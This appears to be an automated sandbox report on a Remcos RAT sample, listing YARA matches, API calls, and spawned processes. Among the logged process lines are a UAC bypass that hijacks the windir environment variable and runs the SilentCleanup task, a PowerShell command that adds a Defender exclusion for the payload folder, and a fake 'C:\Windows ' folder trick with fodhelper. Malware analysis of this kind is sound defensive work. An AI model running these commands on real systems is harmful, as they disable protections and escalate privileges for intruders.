Source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\cde.bat' '
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Htdr
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_10544F6C NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,20_2_10544F6C
Contains functionality to shutdown / reboot the system
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai20_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_1053F6ED atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_1053F6ED
Creates files inside the system directory
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows 
Deletes files inside the Windows folder
Source: C:\Windows\System32\cmd.exe | File deleted: C:\Windows \System32
Detected potential crypto function
Source: C:\Users\user\Desktop\readme.exe | Code function: 0_2_0045AD28 | 0_2_0045AD28
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED1D74 | 10_2_00007FF6CFED1D74
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED3B30 | 10_2_00007FF6CFED3B30
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED552C | 10_2_00007FF6CFED552C
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED2F10 | 10_2_00007FF6CFED2F10
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED130C | 10_2_00007FF6CFED130C
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED51A4 | 10_2_00007FF6CFED51A4
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED32A0 | 10_2_00007FF6CFED32A0
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED7594 | 10_2_00007FF6CFED7594
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED718C | 10_2_00007FF6CFED718C
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED4C74 | 10_2_00007FF6CFED4C74
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_00007FF6CFED2340 | 10_2_00007FF6CFED2340
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_0040D1E8 | 20_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_105310A7 | 20_2_105310A7
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_0045AD28 | 21_2_0045AD28
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00402150 | 21_2_00402150
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0045AD28 | 29_2_0045AD28
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_00402150 | 29_2_00402150
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0043EBB0 | 29_2_0043EBB0
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_029220E4 | 29_2_029220E4
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 1054519E appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 00413956 appears 47 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: String function: 00403ECC appears 33 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: String function: 00406A20 appears 65 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: String function: 004099FC appears 77 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: String function: 0040492C appears 96 times
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: String function: 02924A04 appears 59 times
PE file contains more sections than normal
Source: propsys.dll.8.dr | Static PE information: Number of sections : 19 > 10
PE file contains strange resources
Source: readme.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Htdrset.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Sample file name differs from the original file name recorded in the version info
Source: readme.exe, 00000000.00000002.667484053.0000000002330000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs readme.exe
Source: readme.exe, 00000000.00000002.672622168.0000000002A40000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs readme.exe
Source: readme.exe, 00000000.00000002.675597032.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameFodHelper.EXEj% vs readme.exe
Source: readme.exe, 00000000.00000002.667495590.0000000002340000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs readme.exe
Source: readme.exe, 00000000.00000002.672693367.0000000002B90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs readme.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature match
Matched rule: SUSP_Reversed_Base64_Encoded_EXE (date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file)
Sources, type MEMORY:
  0000001D.00000003.696464446.0000000004484000.00000004.00000001.sdmp
  00000000.00000002.672807932.0000000002CF0000.00000004.00000001.sdmp
  00000015.00000003.714523089.00000000006FA000.00000004.00000001.sdmp
  00000015.00000003.670638427.0000000004544000.00000004.00000001.sdmp
  00000015.00000002.719648979.0000000002A30000.00000004.00000001.sdmp
  0000001D.00000002.722815102.0000000002720000.00000004.00000001.sdmp
  00000000.00000003.608868353.0000000004564000.00000004.00000001.sdmp
  00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp
  0000001D.00000003.717391544.000000000064F000.00000004.00000001.sdmp
  0000001D.00000003.717525769.000000000064F000.00000004.00000001.sdmp
  00000015.00000002.716511670.00000000006FA000.00000004.00000001.sdmp
  00000015.00000003.714157968.00000000006FA000.00000004.00000001.sdmp
  0000001D.00000003.696287311.0000000004404000.00000004.00000001.sdmp
  00000000.00000003.609002183.00000000045E4000.00000004.00000001.sdmp
  0000001D.00000002.719190020.000000000064F000.00000004.00000001.sdmp
  00000015.00000003.670834487.00000000045C4000.00000004.00000001.sdmp
  Process Memory Space: readme.exe PID: 4288
  Process Memory Space: Htdrset.exe PID: 4524
  Process Memory Space: Htdrset.exe PID: 4696
Sources, type DROPPED:
  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KGYEP10B\Htdr[1]
  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T7L7U67X\Htdr[1]
  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W2BICE6W\Htdr[1]
Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Matched rule: Remcos_1 (author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload)
Both REMCOS rules matched in each of the following sources.
Sources, type MEMORY:
  00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp
  00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp
  00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp
  00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp
  00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp
  00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp
Sources, type UNPACKEDPE:
  34.2.ieinstal.exe.10530000.2.unpack
  33.2.ieinstal.exe.10530000.2.unpack
  20.2.ieinstal.exe.10530000.2.unpack
  34.2.ieinstal.exe.10530000.2.raw.unpack
  34.2.ieinstal.exe.400000.0.raw.unpack
  34.2.ieinstal.exe.400000.0.unpack
  20.2.ieinstal.exe.400000.0.raw.unpack
  20.2.ieinstal.exe.10530000.2.raw.unpack
  33.2.ieinstal.exe.400000.0.unpack
  20.2.ieinstal.exe.400000.0.unpack
  33.2.ieinstal.exe.10530000.2.raw.unpack
  33.2.ieinstal.exe.400000.0.raw.unpack
Classification label
Source: classification engine; Classification label: mal100.rans.troj.spyw.evad.winEXE@58/25@7/2
Contains functionality for error logging
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 21_2_00422410 GetLastError,FormatMessageA,21_2_00422410
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_0040EB33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_1054037B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_1054037B
Contains functionality to check free disk space
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 29_2_00409242 GetDiskFreeSpaceA,29_2_00409242
Contains functionality to enum processes or threads
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_00409AA0
Contains functionality to instantiate COM classes
Source: C:\Windows \System32\fodhelper.exe; Code function: 10_2_00007FF6CFED3B30 CoCreateInstance,GetProcessHeap,HeapAlloc,EnterCriticalSection,CoAddRefServerProcess,LeaveCriticalSection,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,CoTaskMemFree,GetProcessHeap,HeapFree,10_2_00007FF6CFED3B30
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\readme.exe; Code function: 0_2_00414CEC FindResourceA,0_2_00414CEC
Contains functionality to modify services (start/stop/modify)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_004111A9
Creates files inside the user directory
Source: C:\Users\user\Desktop\readme.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W2BICE6W\1cz9sVIo7vuQlevGvVvv2eYYPIQVPcEnI[1].htm
Creates mutexes
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Mutant created: \Sessions\1\BaseNamedObjects\Nerdpol-NUCW3I
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_01
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_01
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_01
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4076:120:WilError_01
Creates temporary files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yop40vn5.eib.ps1
Executes batch files
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Executes visual basic scripts
Source: unknown; Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\Public\x.vbs
Parts of this application are using Borland Delphi (probably coded in Delphi)
Source: C:\Users\user\Desktop\readme.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini files
Source: C:\Users\user\Desktop\readme.exe; File read: C:\Windows\win.ini
Reads software policies
Source: C:\Users\user\Desktop\readme.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\Desktop\readme.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; File read: C:\Windows\System32\drivers\etc\hosts
Sample reads its own file content
Source: C:\Users\user\Desktop\readme.exe; File read: C:\Users\user\Desktop\readme.exe
Spawns processes
Source: unknown; Process created: C:\Users\user\Desktop\readme.exe 'C:\Users\user\Desktop\readme.exe'
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown; Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknown; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknown; Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Runex.bat' '
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows \System32\fodhelper.exe C:\Windows \System32\fodhelper.exe
Source: unknown; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\System32\cmd.exe cmd /c C:\Users\Public\x.vbs
Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\x.vbs'
Source: unknown; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\cde.bat' '
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Htdr
Source: unknown; Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Local\Htdr\Htdr.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Local\Htdr\Htdr.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\readme.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' 'Jump to behavior
Source: C:\Users\user\Desktop\readme.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Runex.bat' 'Jump to behavior
Source: C:\Users\user\Desktop\readme.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
